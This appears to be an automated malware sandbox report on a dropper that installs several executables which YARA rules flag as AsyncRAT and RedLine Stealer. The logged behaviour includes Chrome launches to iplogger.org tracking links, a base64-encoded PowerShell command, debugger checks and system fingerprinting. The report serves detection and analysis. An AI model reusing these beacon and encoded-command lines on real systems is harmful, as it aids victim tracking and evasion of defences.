Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,	23_2_0040B177
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00401B05 FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindClose,	23_2_00401B05
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,LocalFree,FindClose,	23_2_0040AE06
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	23_2_00403C8F
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	23_2_00401E18
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,	23_2_00406725
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_0040633E FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,lstrlenW,	23_2_0040633E

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

20_2_00408ADD

Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe

Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe

Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process created: Base64 decoded Start-Sleep -Seconds 34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process created: Base64 decoded Start-Sleep -Seconds 34

Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AEmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\F0geI.exe "C:\Program Files (x86)\Company\NewProduct\F0geI.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\real.exe "C:\Program Files (x86)\Company\NewProduct\real.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\safert44.exe "C:\Program Files (x86)\Company\NewProduct\safert44.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\jshainx.exe "C:\Program Files (x86)\Company\NewProduct\jshainx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\brokerius.exe "C:\Program Files (x86)\Company\NewProduct\brokerius.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\captain09876.exe "C:\Program Files (x86)\Company\NewProduct\captain09876.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe "C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\WW1.exe "C:\Program Files (x86)\Company\NewProduct\WW1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: LocalAlloc,LocalAlloc,LocalAlloc,GetLocaleInfoW,GetUserDefaultLCID,GetLocaleInfoW,wsprintfW,LocalFree,LocalFree,	20_2_00409064
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: ___getlocaleinfo,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,	20_2_00414900
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,	20_2_00427A30
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: ___crtGetLocaleInfoW,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,_isdigit,	20_2_00423CA0
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	20_2_00426D20
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,	20_2_00427660
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,	20_2_0042E740
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,	20_2_0042E7B0
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: LocalAlloc,LocalAlloc,LocalAlloc,GetLocaleInfoW,GetUserDefaultLCID,GetLocaleInfoW,wsprintfW,LocalFree,LocalFree,	23_2_00409064

Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Program Files (x86)\Company\NewProduct\safert44.exe VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Program Files (x86)\Company\NewProduct\jshainx.exe VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Queries volume information: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 20_2_004092CF cpuid

20_2_004092CF

Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 20_2_0040919C LocalAlloc,GetTimeZoneInformation,LocalAlloc,wsprintfW,LocalFree,

20_2_0040919C

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 20_2_0040A672 LocalAlloc,GetUserNameW,

20_2_0040A672

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: SETUP_~1.EXE PID: 7812, type: MEMORYSTR

Source: namdoitntn.exe, 0000001A.00000002.824055671.00000000009BE000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.825659178.0000000000920000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 26.0.namdoitntn.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.0.ffnameedit.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.0.jshainx.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.WSkT8d093C.exe.3adae14.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.WSkT8d093C.exe.3adae14.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000000.343257573.00000000002F2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.356865696.00000000003F3000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.272716591.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.371239903.0000000000153000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: namdoitntn.exe PID: 8632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: safert44.exe PID: 9112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jshainx.exe PID: 9184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ffnameedit.exe PID: 8164, type: MEMORYSTR
